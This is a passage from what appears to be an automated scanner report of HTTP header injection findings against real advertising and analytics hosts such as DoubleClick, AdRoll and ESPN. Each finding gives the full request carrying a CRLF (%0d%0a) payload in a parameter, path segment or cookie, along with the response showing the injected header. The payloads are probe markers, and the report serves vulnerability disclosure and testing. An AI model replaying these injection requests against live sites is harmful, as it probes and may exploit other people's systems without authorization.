Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/114ab
56fe5779902
/KOMO/HOME;sz=978x300,978x30;tile=1;ord=3730400381609797.5:
Date: Wed, 23 Feb 2011 21:47:52 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.8. http://ad.doubleclick.net/adj/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9a8fc%0d%0a4fd310fcf47 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9a8fc%0d%0a4fd310fcf47/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9a8fc
4fd310fcf47
/N3175.134426.GOOGLECONTENTNETWO1/B4640114.10:
Date: Wed, 23 Feb 2011 23:11:27 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.9. http://ad.doubleclick.net/adj/N3175.150800.VALUECLICK/B4640114.8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N3175.150800.VALUECLICK/B4640114.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 7913d%0d%0a9b3876ddb61 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /7913d%0d%0a9b3876ddb61/N3175.150800.VALUECLICK/B4640114.8 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/7913d
9b3876ddb61
/N3175.150800.VALUECLICK/B4640114.8:
Date: Wed, 23 Feb 2011 23:11:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.10. http://ad.doubleclick.net/adj/N5271.glammedia.com/B5431193.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5271.glammedia.com/B5431193.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 18fe9%0d%0afdde7ae2b74 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /18fe9%0d%0afdde7ae2b74/N5271.glammedia.com/B5431193.4;sz=300x250;pc=[TPAS_ID];click=http://www30a2.glam.com/gad/click.act?0396-_urlenc%3D1-_gclickid%3Dgaclk4daf878acfac9-_advid%3D50002316-_adid%3D5000038225-_crid%3D500027662-_aipid%3D201104201815-_ge_%3D1%5E2%5E4d0b2a340212dd6ac8de952f71f0f533-ord%3D8514925059862435-afid%3D444496-dsid%3D444496-sz%3D300x250-zone%3D%2F-sid%3D116391130334874196611-tile%3D2-seq%3D1-tt%3Dj-atf%3D1-url%3D00001b-flg%3D64-u%3Db006215kwup1q1fzsk9%2Cf0f12sa%2Cg10001s-_gclick_gaclk4daf878acfac9;ord=4daf878ace741? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/18fe9
fdde7ae2b74
/N5271.glammedia.com/B5431193.4;sz=300x250;pc=[TPAS_ID];click=http: //www30a2.glam.com/gad/click.act
Date: Thu, 21 Apr 2011 01:38:23 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.11. http://ad.doubleclick.net/adj/N5295.Internet.com/B5200652.4 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/N5295.Internet.com/B5200652.4

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14cab%0d%0aadadb0e98e8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14cab%0d%0aadadb0e98e8/N5295.Internet.com/B5200652.4 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/14cab
adadb0e98e8
/N5295.Internet.com/B5200652.4:
Date: Sat, 26 Feb 2011 01:58:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.12. http://ad.doubleclick.net/adj/cm.glam_lifestyle/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/cm.glam_lifestyle/

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1d178%0d%0a5974a99533b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1d178%0d%0a5974a99533b/cm.glam_lifestyle/;net=cm;u=,cm-42181530_1303349054,11f8f328940989e,ent,ax.40;;cmw=owl;sz=160x600;net=cm;env=ifr;ord1=82789;contx=ent;an=40;dc=w;btg=;ord=1303349053? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/imp/iframe/100/glammedia/160x600/367631667/ac5afe89-dbe3-4a99-9c60-59f4fb495cb9/ce486e34-952b-40f2-86f9-06615005178d?url=http%3A%2F%2Fpoponthepop%2Ecom%2F2011%2F04%2Flindsay%2Dlohan%2Dloses%2Dvictoria%2Dgotti%2Drole%2F&price_floor=&r=1303349053
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1d178
5974a99533b
/cm.glam_lifestyle/;net=cm;u=,cm-42181530_1303349054,11f8f328940989e,ent,ax.40;;cmw=owl;sz=160x600;net=cm;env=ifr;ord1=82789;contx=ent;an=40;dc=w;btg=;ord=1303349053:
Date: Thu, 21 Apr 2011 01:30:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.13. http://ad.doubleclick.net/adj/manta.comp/energy_resources [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/manta.comp/energy_resources

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 85463%0d%0a72da8b233c1 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /85463%0d%0a72da8b233c1/manta.comp/energy_resources HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/85463
72da8b233c1
/manta.comp/energy_resources:
Date: Sat, 26 Feb 2011 01:58:24 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.14. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 79d74%0d%0acd80de9ecdd was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gif79d74%0d%0acd80de9ecdd?4daf878530074 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://celebrities.glam.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gif79d74
cd80de9ecdd
:
Date: Thu, 21 Apr 2011 01:38:11 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

2.15. http://ad.doubleclick.net/jump/N3175.150800.VALUECLICK/B4640114.8 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N3175.150800.VALUECLICK/B4640114.8

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 272ea%0d%0ade140a0ddee was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /272ea%0d%0ade140a0ddee/N3175.150800.VALUECLICK/B4640114.8 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/272ea
de140a0ddee
/N3175.150800.VALUECLICK/B4640114.8:
Date: Wed, 23 Feb 2011 23:11:17 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.16. http://ad.doubleclick.net/jump/N5295.Internet.com/B5200652.6 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /jump/N5295.Internet.com/B5200652.6

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 91854%0d%0aeec45a3397a was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /91854%0d%0aeec45a3397a/N5295.Internet.com/B5200652.6 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c708f553300004b|1906242/708168/15022|t=1297805141|et=730|cs=v3vpvykb;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/91854
eec45a3397a
/N5295.Internet.com/B5200652.6:
Date: Sat, 26 Feb 2011 01:58:25 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

2.17. http://cas.clickability.com/t [u parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.clickability.com
Path:   /t

Issue detail

The value of the u request parameter is copied into the Location response header. The payload 87229%0d%0aa9e26f54f1 was submitted in the u parameter. This caused a response containing an injected HTTP header.

Request

GET /t?d=133716&c=3031&n=167742&a=328192&r=1577646587&u=87229%0d%0aa9e26f54f1 HTTP/1.1
Host: cas.clickability.com
Proxy-Connection: keep-alive
Referer: http://www.komonews.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Date: Wed, 23 Feb 2011 21:37:54 GMT
Server: Apache
Cache-Control: no-store, no-cache
pragma: no-cache
Expires: 0
Location: http://cas.clickability.com/87229
a9e26f54f1

Content-Length: 0
X-Server-Name: dv-c1-r1-u7-b2
Connection: close
Content-Type: text/plain; charset=UTF-8


2.18. http://d.adroll.com/pixel/FWN5JUPQAJE4XJIM4JEU2F/7QKKZNUYGZBKBKY3PBNPYI [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/FWN5JUPQAJE4XJIM4JEU2F/7QKKZNUYGZBKBKY3PBNPYI

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload 3e47d%0d%0a5f457126fc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /pixel/3e47d%0d%0a5f457126fc/7QKKZNUYGZBKBKY3PBNPYI?pv=73449358646.7579&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Tue, 19 Apr 2011 01:52:08 GMT
Connection: keep-alive
Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/3e47d
5f457126fc
/7QKKZNUYGZBKBKY3PBNPYI/ADLLSWOYQRDC7DYKK7QWPE.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.19. http://d.adroll.com/pixel/FWN5JUPQAJE4XJIM4JEU2F/7QKKZNUYGZBKBKY3PBNPYI [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/FWN5JUPQAJE4XJIM4JEU2F/7QKKZNUYGZBKBKY3PBNPYI

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload 832de%0d%0ac0773e65071 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /pixel/FWN5JUPQAJE4XJIM4JEU2F/832de%0d%0ac0773e65071?pv=73449358646.7579&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/contact
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Tue, 19 Apr 2011 01:52:18 GMT
Connection: keep-alive
Set-Cookie: __adroll=9de52dcbec4c3cf1dab71495bd2ad935; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/retarget/FWN5JUPQAJE4XJIM4JEU2F/832de
c0773e65071
/pixel.js:
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate


2.20. http://int.sitestat.com/comscore/comscore/s [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://int.sitestat.com
Path:   /comscore/comscore/s

Issue detail

The value of REST URL parameter 3 is copied into the Location response header. The payload a0d85%0d%0a378354ac399 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.

Request

GET /comscore/comscore/a0d85%0d%0a378354ac399?name=comScore_default&ns__t=1298695259665&ns_c=UTF-8&ns_ti=Products%20%26%20Services%20-%20comScore%2C%20Inc&ns_jspageurl=http%3A//comscore.com/index.php//Products_Services&ns_referrer=http%3A//comscore.com/ HTTP/1.1
Host: int.sitestat.com
Proxy-Connection: keep-alive
Referer: http://comscore.com/index.php//Products_Services
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 04:41:14 GMT
Server: Apache
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Cache-Control: no-cache
P3P: policyref="http://www.nedstat.com/w3c/p3p.xml", CP="NOI DSP COR NID PSA ADM OUR IND NAV COM"
Set-Cookie: s1=4D68846A71FA02FD; expires=Thu, 25-Feb-2016 04:41:14 GMT; path=/comscore/comscore/
Set-Cookie: c1=4D68846A71FA02FE; expires=Thu, 25-Feb-2016 04:41:14 GMT; path=/comscore/
Location: http://int.sitestat.com/comscore/comscore/a0d85
378354ac399
?name=comScore_default&ns_m2=yes&ns_setsiteck=4D68846A71FA02FD&ns_setcorpck=4D68846A71FA02FE&ns__t=1298695259665&ns_c=UTF-8&ns_ti=Products%20%26%20Services%20-%20comScore%2C%20Inc&ns_jspageurl=http%3A//comscore.com/index.php//Products_Services&ns_referrer=http%3A//comscore.com/
Content-Length: 554
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://int.sitestat.com/comscore/comscore/a0d85
...[SNIP]...

2.21. http://log.go.com/log [cp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://log.go.com
Path:   /log

Issue detail

The value of the cp request parameter is copied into the Location response header. The payload afe57%0d%0aa02328e0a57 was submitted in the cp parameter. This caused a response containing an injected HTTP header.

Request

GET /log?srvc=sz&guid=FC2AD524-5155-48E0-AB89-6D5A39421700&drop=0&addata=3457:65:776740:65&a=1&goto=http://www.espnshop.com/family/index.jsp?categoryId=4471902&cp=afe57%0d%0aa02328e0a57&source=ESPN_TEDINTEGRATOR:DVDS02_09_10 HTTP/1.1
Host: log.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 302 OK
Cache-control: no-store
Pragma: no-cache
Expires: 0
Content-Length: 0
Location: http://www.espnshop.com/family/index.jsp?categoryId=4471902&cp=afe57
a02328e0a57
&source=ESPN_TEDINTEGRATOR:DVDS02_09_10
P3P: CP="ALL ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Connection: close


2.22. http://log.go.com/log [source parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://log.go.com
Path:   /log

Issue detail

The value of the source request parameter is copied into the Location response header. The payload 64871%0d%0afbf1a44686f was submitted in the source parameter. This caused a response containing an injected HTTP header.

Request

GET /log?srvc=sz&guid=92F96588-1A99-4863-9B75-CE517F79112C&drop=0&addata=3374:65:478847:65&a=1&goto=http://espnshop.com/entry.point?target=Z&source=64871%0d%0afbf1a44686f HTTP/1.1
Host: log.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DE2=dXNhO3R4O2RhbGxhczticm9hZGJhbmQ7NTs0OzM7NjIzOzAzMi43ODc7LTA5Ni43OTk7ODQwOzQ0Ozc3OzY7dXM7; DS=c29mdGxheWVyLmNvbTswO3NvZnRsYXllciB0ZWNobm9sb2dpZXMgaW5jLjs=; CRBLM=CBLM-001:; CRBLM_LAST_UPDATE=1298497363; SWID=EEF93A7D-3488-4FA5-8C21-135C0F4819BF;

Response

HTTP/1.1 302 OK
Cache-control: no-store
Pragma: no-cache
Expires: 0
Content-Length: 0
Location: http://espnshop.com/entry.point?target=Z&source=64871
fbf1a44686f

P3P: CP="ALL ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Connection: close


2.23. http://o1.qnsr.com/cgi/c [a parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/c

Issue detail

The value of the a request parameter is copied into the Location response header. The payload 441d9%0d%0ab396da36437 was submitted in the a parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3Be%3Di%3Bs%3D9542%3Bg%3D172%3Bw%3D56%3Bm%3D0%3Bz%3D6498010861%3Bk%3Dhttp://t.atdmt.com441d9%0d%0ab396da36437 HTTP/1.1
Host: o1.qnsr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:12:26 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TWhhigqABU0AAFE6SAc; domain=.qnsr.com; path=/; expires=Tue, 23-Feb-21 02:12:26 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Location: http://t.atdmt.com441d9
b396da36437
?&CCID=20144456203687985&QTR=ZZf0Za20144456Zb0Zg172Zw56Zm0Zc203687985,203687985Zs9542ZZ&CLK=524110225181226259&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 417

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://t.atdmt.com441d9
b396da36437?&amp;CCID=201
...[SNIP]...

2.24. http://o1.qnsr.com/cgi/c [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://o1.qnsr.com
Path:   /cgi/c

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload 91f69%0d%0a40968b429be was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /cgi/c?a=20144456%3Bx=2305%3Bg=0,0%3Bc=203687985,203687985%3Bi=0%3Bn=203%3Bs=9542%3Be%3Di%3Bs%3D9542%3Bg%3D172%3Bw%3D56%3Bm%3D0%3Bz%3D6498010861%3Bk%3Dhttp://t.atdmt.com&91f69%0d%0a40968b429be=1 HTTP/1.1
Host: o1.qnsr.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sat, 26 Feb 2011 02:12:30 GMT
Server: QUAD 3G
Set-Cookie: QIDA=TWhhjgqABU0AAFHdFR0; domain=.qnsr.com; path=/; expires=Tue, 23-Feb-21 02:12:30 GMT
Connection: close
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache
Location: http://t.atdmt.com&91f69
40968b429be
=1?&CCID=20144456203687985&QTR=ZZf0Za20144456Zb0Zg172Zw56Zm0Zc203687985,203687985Zs9542ZZ&CLK=404110225181230908&&exp=y
Content-Type: text/html; charset=iso-8859-1
Content-Length: 424

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://t.atdmt.com&amp;91f69
40968b429be=1?&amp;C
...[SNIP]...

2.25. http://search.espn.go.com/results [searchString parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://search.espn.go.com
Path:   /results

Issue detail

The value of the searchString request parameter is copied into the Location response header. The payload 16ec8%0d%0a7bfed230cc was submitted in the searchString parameter. This caused a response containing an injected HTTP header.

Request

GET /results?searchString=16ec8%0d%0a7bfed230cc&fromForm=true HTTP/1.1
Host: search.espn.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Content-Length: 21878
Content-Type: text/html; charset=iso-8859-1
Location: http://search.espn.go.com/16ec8
7bfed230cc
/
Server: barista/3.3.6
Set-Cookie: userTyped=true;expires=Thu, 24-Feb-2011 11:06:19 GMT;path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-
...[SNIP]...

2.26. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

Summary

Severity:   High
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /rtx/r.js

Issue detail

The value of the N cookie is copied into the Set-Cookie response header. The payload ea197%0d%0add134ef5f12 was submitted in the N cookie. This caused a response containing an injected HTTP header.

Request

GET /rtx/r.js?cmd=DWT:DUY&si=18139&pi=L&xs=3&pu=http%253A//an.tacoda.net/an/18139/bizo_multi.htm%253Fpid%253D224%2526u%253Dfa%253Afa_it%252Cind%253Aind_bizser%2526ifu%253Dhttp%25253A//js.bizographics.com/support/partner.html%25253Fpid%25253D224%252526u%25253Dfa%25253Afa_it%25252Cind%25253Aind_bizser&df=1&v=5.5&cb=54408 HTTP/1.1
Host: tacoda.at.atwola.com
Proxy-Connection: keep-alive
Referer: http://an.tacoda.net/an/18139/bizo_multi.htm?pid=224&u=fa:fa_it,ind:ind_bizser
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; ANRTT=53615^1^1298647046|52766^1^1298647046|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; TData=99999|^|#|53615|52766|60130|50213|50239; N=2:cdf4c464d15cc8a036230e4fb13e242c,2d4ec7443dfa469e64430537b01b46dcea197%0d%0add134ef5f12; ATTAC=a3ZzZWc9OTk5OTk6NTM2MTU6NTI3NjY6NjAxMzA6NTAyMTM6NTAyMzk=

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 00:22:21 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
P3P: policyref="http://www.tacoda.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Cache-Control: max-age=900
Expires: Sat, 26 Feb 2011 00:37:21 GMT
Set-Cookie: ATTACID=a3Z0aWQ9MTZsc3FpaTFuMWEzY3I=; path=/; expires=Tue, 21-Feb-12 00:22:21 GMT; domain=.at.atwola.com
Set-Cookie: ANRTT=53615^1^1299284541|52766^1^1299284541|60130^1^1298898484|50213^1^1298930280|50239^1^1298930837; path=/; expires=Sat, 05-Mar-11 00:22:21 GMT; domain=tacoda.at.atwola.com
Set-Cookie: Tsid=0^1298679741^1298681541|18139^1298679741^1298681541; path=/; expires=Sat, 26-Feb-11 00:52:21 GMT; domain=tacoda.at.atwola.com
Set-Cookie: TData=99999|^|53575|53656|56768|56830|56835|60515|#|53615|52766|60130|50213|50239; expires=Tue, 21-Feb-12 00:22:21 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: Anxd=x; expires=Sat, 26-Feb-11 06:22:21 GMT; path=/; domain=tacoda.at.atwola.com
Set-Cookie: N=2:2d4ec7443dfa469e64430537b01b46dcea197
dd134ef5f12
,d2e443c9307d12f368e0d29c574482d3; expires=Tue, 21-Feb-12 00:22:21 GMT; path=/; domain=tacoda.at.atwola.com
